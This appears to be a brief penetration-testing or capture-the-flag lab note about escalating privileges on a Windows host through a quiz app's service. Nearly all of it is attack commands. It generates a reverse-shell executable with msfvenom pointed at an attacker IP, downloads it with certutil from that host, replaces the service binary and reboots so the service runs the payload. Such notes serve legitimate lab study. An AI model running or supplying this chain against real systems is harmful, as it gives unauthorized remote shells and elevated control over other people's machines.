45332

We have a quiz app here.

We can try this

searchsploit -x windows/local/48789.txt
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.245 LPORT=445 -f exe -o bd.exe

Now we can replace the bd.exe binary:

move bd.exe bd.service.exe
certutil -urlcache -f http://192.168.45.245/bd.exe bd.exe

Now transfer and reboot:

shutdown /r

Last updated